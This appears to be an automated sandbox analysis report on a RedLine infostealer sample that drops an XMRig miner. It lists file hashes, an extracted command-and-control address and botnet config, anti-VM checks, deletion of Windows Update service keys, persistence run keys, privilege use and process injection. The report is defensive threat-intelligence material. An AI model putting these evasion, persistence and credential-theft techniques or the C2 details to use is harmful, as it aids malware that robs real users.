redline | 847e1e62de8a0e2f7e2a2024f74131bfd9ce8c81ebed2ce53e83d11516487443

Analysis

max time kernel
168s
max time network
174s
platform
windows10-2004_x64
resource
win10v2004-20220721-en
resource tags

arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system
submitted
07-08-2022 12:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2d3503d8540e319851a67e55f06ed9e5ba060e821eec6dbc83960a5947ad1310.exe
Size

128KB
MD5

a7661b5802ed9c34ca2244e90efc83ce
SHA1

94fc10dd134800e663dca7af716e1cea0687bd02
SHA256

847e1e62de8a0e2f7e2a2024f74131bfd9ce8c81ebed2ce53e83d11516487443
SHA512

e3f19fb7518ea481f050441a868c86b90287ca256a5342beb602bfea18ba951db17866519b3a2d7d65f18a1c20839336e14134dbf30f050128e8fa3bb3bd91eb

Score

10^/10

redline xmrig logsdiller cloud (sup: @mr_golds)discovery evasion exploit infostealer miner persistence spyware stealer themida trojan

Malware Config

Extracted

Family

redline

Botnet

LogsDiller Cloud (Sup: @mr_golds)

193.233.193.14:8163

Attributes

auth_value
56c6f7b9024c076f0a96931453da7e56

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

schtasks.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	schtasks.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	schtasks.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	schtasks.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	schtasks.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	schtasks.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4696-130-0x0000000000B90000-0x0000000000BB0000-memory.dmp	family_redline

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

11.exeupdater.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 11.exe
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ updater.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	11.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	updater.exe

XMRig Miner payload 5 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/3132-259-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral2/memory/3132-261-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral2/memory/3132-263-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral2/memory/3132-265-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral2/memory/3132-267-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig

Downloads MZ/PE file

Drops file in Drivers directory 2 IoCs

Processes:

conhost.execonhost.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	conhost.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	conhost.exe

Executes dropped EXE 2 IoCs

Processes:

11.exeupdater.exe

pid process

312 11.exe
2012 updater.exe
Possible privilege escalation attempt 4 IoCs
exploit

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

2336 takeown.exe
1040 icacls.exe
1968 takeown.exe
3484 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
312	11.exe
2012	updater.exe

pid	process
2336	takeown.exe
1040	icacls.exe
1968	takeown.exe
3484	icacls.exe

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

11.exeupdater.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	11.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	11.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	updater.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	updater.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

2d3503d8540e319851a67e55f06ed9e5ba060e821eec6dbc83960a5947ad1310.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Control Panel\International\Geo\Nation	2d3503d8540e319851a67e55f06ed9e5ba060e821eec6dbc83960a5947ad1310.exe

Modifies file permissions 1 TTPs 4 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

2336 takeown.exe
1040 icacls.exe
1968 takeown.exe
3484 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
2336	takeown.exe
1040	icacls.exe
1968	takeown.exe
3484	icacls.exe

Themida packer 9 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\11.exe	themida
C:\Users\Admin\AppData\Local\Temp\11.exe	themida
behavioral2/memory/312-146-0x0000000000400000-0x0000000001066000-memory.dmp	themida
behavioral2/memory/312-147-0x0000000000400000-0x0000000001066000-memory.dmp	themida
C:\Program Files\Google\Chrome\updater.exe	themida
C:\Program Files\Google\Chrome\updater.exe	themida
behavioral2/memory/2012-210-0x0000000000400000-0x0000000001066000-memory.dmp	themida
behavioral2/memory/2012-211-0x0000000000400000-0x0000000001066000-memory.dmp	themida
behavioral2/memory/2012-213-0x0000000000400000-0x0000000001066000-memory.dmp	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Adds Run key to start application 2 TTPs 1 IoCs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Processes:

msedge.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Software\Microsoft\Windows\CurrentVersion\Run	msedge.exe

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

updater.exe11.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	updater.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	11.exe

Drops file in System32 directory 6 IoCs

Processes:

powershell.execonhost.exepowershell.EXE

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log	conhost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

11.exeupdater.exe

pid process

312 11.exe
2012 updater.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

conhost.exe

description pid process target process

PID 792 set thread context of 3132 792 conhost.exe explorer.exe

pid	process
312	11.exe
2012	updater.exe

description	pid	process	target process
PID 792 set thread context of 3132	792	conhost.exe	explorer.exe

Drops file in Program Files directory 5 IoCs

Processes:

conhost.exepowershell.exesetup.exe

description	ioc	process
File created	C:\Program Files\Google\Libs\WR64.sys	conhost.exe
File created	C:\Program Files\Google\Chrome\updater.exe	powershell.exe
File opened for modification	C:\Program Files\Google\Chrome\updater.exe	powershell.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\f9fa7abc-0d49-4de9-b1cd-f36835128bfb.tmp	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220807141424.pma	setup.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

4108 sc.exe
5076 sc.exe
5000 sc.exe
3928 sc.exe
372 sc.exe
2224 sc.exe
4852 sc.exe
3140 sc.exe
5092 sc.exe
4192 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
4108	sc.exe
5076	sc.exe
5000	sc.exe
3928	sc.exe
372	sc.exe
2224	sc.exe
4852	sc.exe
3140	sc.exe
5092	sc.exe
4192	sc.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exepowershell.EXEconhost.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	conhost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe

Modifies registry class 1 IoCs

Processes:

msedge.exe

description ioc process

Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

Modifies registry key 1 TTPs 18 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid	process
4364	reg.exe
4168	reg.exe
3584	reg.exe
2188	reg.exe
2192	reg.exe
1472	reg.exe
3292	reg.exe
4364	reg.exe
2160	reg.exe
1776	reg.exe
4676	reg.exe
1860	reg.exe
4920	reg.exe
1612	reg.exe
2852	reg.exe
3840	reg.exe
4552	reg.exe
1052	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

2d3503d8540e319851a67e55f06ed9e5ba060e821eec6dbc83960a5947ad1310.exepowershell.execonhost.exepowershell.exemsedge.exemsedge.exepowershell.EXEpowershell.exeidentity_helper.execonhost.exeexplorer.exe

pid	process
4696	2d3503d8540e319851a67e55f06ed9e5ba060e821eec6dbc83960a5947ad1310.exe
1244	powershell.exe
1244	powershell.exe
5028	conhost.exe
4416	powershell.exe
4416	powershell.exe
3316	msedge.exe
3316	msedge.exe
5048	msedge.exe
5048	msedge.exe
3144	powershell.EXE
3144	powershell.EXE
3144	powershell.EXE
2064	powershell.exe
2064	powershell.exe
2064	powershell.exe
516	identity_helper.exe
516	identity_helper.exe
792	conhost.exe
792	conhost.exe
3132	explorer.exe
3132	explorer.exe
3132	explorer.exe
3132	explorer.exe
3132	explorer.exe
3132	explorer.exe
3132	explorer.exe
3132	explorer.exe
3132	explorer.exe
3132	explorer.exe
3132	explorer.exe
3132	explorer.exe
3132	explorer.exe
3132	explorer.exe
3132	explorer.exe
3132	explorer.exe
3132	explorer.exe
3132	explorer.exe
3132	explorer.exe
3132	explorer.exe
3132	explorer.exe
3132	explorer.exe
3132	explorer.exe
3132	explorer.exe
3132	explorer.exe
3132	explorer.exe
3132	explorer.exe
3132	explorer.exe
3132	explorer.exe
3132	explorer.exe
3132	explorer.exe
3132	explorer.exe
3132	explorer.exe
3132	explorer.exe
3132	explorer.exe
3132	explorer.exe
3132	explorer.exe
3132	explorer.exe
3132	explorer.exe
3132	explorer.exe
3132	explorer.exe
3132	explorer.exe
3132	explorer.exe
3132	explorer.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

644
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

Processes:

msedge.exe

pid process

5048 msedge.exe
5048 msedge.exe
5048 msedge.exe
5048 msedge.exe
5048 msedge.exe

pid	process
644

pid	process
5048	msedge.exe
5048	msedge.exe
5048	msedge.exe
5048	msedge.exe
5048	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

2d3503d8540e319851a67e55f06ed9e5ba060e821eec6dbc83960a5947ad1310.exepowershell.execonhost.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetakeown.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4696	2d3503d8540e319851a67e55f06ed9e5ba060e821eec6dbc83960a5947ad1310.exe
Token: SeDebugPrivilege	1244	powershell.exe
Token: SeDebugPrivilege	5028	conhost.exe
Token: SeShutdownPrivilege	4928	powercfg.exe
Token: SeCreatePagefilePrivilege	4928	powercfg.exe
Token: SeShutdownPrivilege	4424	powercfg.exe
Token: SeCreatePagefilePrivilege	4424	powercfg.exe
Token: SeShutdownPrivilege	2952	powercfg.exe
Token: SeCreatePagefilePrivilege	2952	powercfg.exe
Token: SeShutdownPrivilege	1472	powercfg.exe
Token: SeCreatePagefilePrivilege	1472	powercfg.exe
Token: SeTakeOwnershipPrivilege	1968	takeown.exe
Token: SeDebugPrivilege	4416	powershell.exe
Token: SeIncreaseQuotaPrivilege	4416	powershell.exe
Token: SeSecurityPrivilege	4416	powershell.exe
Token: SeTakeOwnershipPrivilege	4416	powershell.exe
Token: SeLoadDriverPrivilege	4416	powershell.exe
Token: SeSystemProfilePrivilege	4416	powershell.exe
Token: SeSystemtimePrivilege	4416	powershell.exe
Token: SeProfSingleProcessPrivilege	4416	powershell.exe
Token: SeIncBasePriorityPrivilege	4416	powershell.exe
Token: SeCreatePagefilePrivilege	4416	powershell.exe
Token: SeBackupPrivilege	4416	powershell.exe
Token: SeRestorePrivilege	4416	powershell.exe
Token: SeShutdownPrivilege	4416	powershell.exe
Token: SeDebugPrivilege	4416	powershell.exe
Token: SeSystemEnvironmentPrivilege	4416	powershell.exe
Token: SeRemoteShutdownPrivilege	4416	powershell.exe
Token: SeUndockPrivilege	4416	powershell.exe
Token: SeManageVolumePrivilege	4416	powershell.exe
Token: 33	4416	powershell.exe
Token: 34	4416	powershell.exe
Token: 35	4416	powershell.exe
Token: 36	4416	powershell.exe
Token: SeIncreaseQuotaPrivilege	4416	powershell.exe
Token: SeSecurityPrivilege	4416	powershell.exe
Token: SeTakeOwnershipPrivilege	4416	powershell.exe
Token: SeLoadDriverPrivilege	4416	powershell.exe
Token: SeSystemProfilePrivilege	4416	powershell.exe
Token: SeSystemtimePrivilege	4416	powershell.exe
Token: SeProfSingleProcessPrivilege	4416	powershell.exe
Token: SeIncBasePriorityPrivilege	4416	powershell.exe
Token: SeCreatePagefilePrivilege	4416	powershell.exe
Token: SeBackupPrivilege	4416	powershell.exe
Token: SeRestorePrivilege	4416	powershell.exe
Token: SeShutdownPrivilege	4416	powershell.exe
Token: SeDebugPrivilege	4416	powershell.exe
Token: SeSystemEnvironmentPrivilege	4416	powershell.exe
Token: SeRemoteShutdownPrivilege	4416	powershell.exe
Token: SeUndockPrivilege	4416	powershell.exe
Token: SeManageVolumePrivilege	4416	powershell.exe
Token: 33	4416	powershell.exe
Token: 34	4416	powershell.exe
Token: 35	4416	powershell.exe
Token: 36	4416	powershell.exe
Token: SeIncreaseQuotaPrivilege	4416	powershell.exe
Token: SeSecurityPrivilege	4416	powershell.exe
Token: SeTakeOwnershipPrivilege	4416	powershell.exe
Token: SeLoadDriverPrivilege	4416	powershell.exe
Token: SeSystemProfilePrivilege	4416	powershell.exe
Token: SeSystemtimePrivilege	4416	powershell.exe
Token: SeProfSingleProcessPrivilege	4416	powershell.exe
Token: SeIncBasePriorityPrivilege	4416	powershell.exe
Token: SeCreatePagefilePrivilege	4416	powershell.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

msedge.exe

pid process

5048 msedge.exe
5048 msedge.exe
5048 msedge.exe

pid	process
5048	msedge.exe
5048	msedge.exe
5048	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

2d3503d8540e319851a67e55f06ed9e5ba060e821eec6dbc83960a5947ad1310.exe11.exemsedge.execonhost.execmd.execmd.exe

description	pid	process	target process
PID 4696 wrote to memory of 312	4696	2d3503d8540e319851a67e55f06ed9e5ba060e821eec6dbc83960a5947ad1310.exe	11.exe
PID 4696 wrote to memory of 312	4696	2d3503d8540e319851a67e55f06ed9e5ba060e821eec6dbc83960a5947ad1310.exe	11.exe
PID 312 wrote to memory of 5028	312	11.exe	conhost.exe
PID 312 wrote to memory of 5028	312	11.exe	conhost.exe
PID 312 wrote to memory of 5028	312	11.exe	conhost.exe
PID 4696 wrote to memory of 5048	4696	2d3503d8540e319851a67e55f06ed9e5ba060e821eec6dbc83960a5947ad1310.exe	msedge.exe
PID 4696 wrote to memory of 5048	4696	2d3503d8540e319851a67e55f06ed9e5ba060e821eec6dbc83960a5947ad1310.exe	msedge.exe
PID 5048 wrote to memory of 4276	5048	msedge.exe	msedge.exe
PID 5048 wrote to memory of 4276	5048	msedge.exe	msedge.exe
PID 5028 wrote to memory of 1244	5028	conhost.exe	powershell.exe
PID 5028 wrote to memory of 1244	5028	conhost.exe	powershell.exe
PID 5028 wrote to memory of 4892	5028	conhost.exe	cmd.exe
PID 5028 wrote to memory of 4892	5028	conhost.exe	cmd.exe
PID 5028 wrote to memory of 4908	5028	conhost.exe	cmd.exe
PID 5028 wrote to memory of 4908	5028	conhost.exe	cmd.exe
PID 4892 wrote to memory of 5092	4892	cmd.exe	sc.exe
PID 4892 wrote to memory of 5092	4892	cmd.exe	sc.exe
PID 4908 wrote to memory of 4928	4908	cmd.exe	powercfg.exe
PID 4908 wrote to memory of 4928	4908	cmd.exe	powercfg.exe
PID 4892 wrote to memory of 4192	4892	cmd.exe	sc.exe
PID 4892 wrote to memory of 4192	4892	cmd.exe	sc.exe
PID 4908 wrote to memory of 4424	4908	cmd.exe	powercfg.exe
PID 4908 wrote to memory of 4424	4908	cmd.exe	powercfg.exe
PID 4892 wrote to memory of 372	4892	cmd.exe	sc.exe
PID 4892 wrote to memory of 372	4892	cmd.exe	sc.exe
PID 4908 wrote to memory of 2952	4908	cmd.exe	powercfg.exe
PID 4908 wrote to memory of 2952	4908	cmd.exe	powercfg.exe
PID 4908 wrote to memory of 1472	4908	cmd.exe	powercfg.exe
PID 4908 wrote to memory of 1472	4908	cmd.exe	powercfg.exe
PID 4892 wrote to memory of 3928	4892	cmd.exe	schtasks.exe
PID 4892 wrote to memory of 3928	4892	cmd.exe	schtasks.exe
PID 4892 wrote to memory of 5076	4892	cmd.exe	sc.exe
PID 4892 wrote to memory of 5076	4892	cmd.exe	sc.exe
PID 4892 wrote to memory of 1612	4892	cmd.exe	reg.exe
PID 4892 wrote to memory of 1612	4892	cmd.exe	reg.exe
PID 4892 wrote to memory of 3840	4892	cmd.exe	schtasks.exe
PID 4892 wrote to memory of 3840	4892	cmd.exe	schtasks.exe
PID 5028 wrote to memory of 4416	5028	conhost.exe	powershell.exe
PID 5028 wrote to memory of 4416	5028	conhost.exe	powershell.exe
PID 4892 wrote to memory of 3292	4892	cmd.exe	schtasks.exe
PID 4892 wrote to memory of 3292	4892	cmd.exe	schtasks.exe
PID 4892 wrote to memory of 2852	4892	cmd.exe	reg.exe
PID 4892 wrote to memory of 2852	4892	cmd.exe	reg.exe
PID 4892 wrote to memory of 4364	4892	cmd.exe	reg.exe
PID 4892 wrote to memory of 4364	4892	cmd.exe	reg.exe
PID 4892 wrote to memory of 1968	4892	cmd.exe	takeown.exe
PID 4892 wrote to memory of 1968	4892	cmd.exe	takeown.exe
PID 4892 wrote to memory of 3484	4892	cmd.exe	icacls.exe
PID 4892 wrote to memory of 3484	4892	cmd.exe	icacls.exe
PID 5048 wrote to memory of 400	5048	msedge.exe	msedge.exe
PID 5048 wrote to memory of 400	5048	msedge.exe	msedge.exe
PID 5048 wrote to memory of 400	5048	msedge.exe	msedge.exe
PID 5048 wrote to memory of 400	5048	msedge.exe	msedge.exe
PID 5048 wrote to memory of 400	5048	msedge.exe	msedge.exe
PID 5048 wrote to memory of 400	5048	msedge.exe	msedge.exe
PID 5048 wrote to memory of 400	5048	msedge.exe	msedge.exe
PID 5048 wrote to memory of 400	5048	msedge.exe	msedge.exe
PID 5048 wrote to memory of 400	5048	msedge.exe	msedge.exe
PID 5048 wrote to memory of 400	5048	msedge.exe	msedge.exe
PID 5048 wrote to memory of 400	5048	msedge.exe	msedge.exe
PID 5048 wrote to memory of 400	5048	msedge.exe	msedge.exe
PID 5048 wrote to memory of 400	5048	msedge.exe	msedge.exe
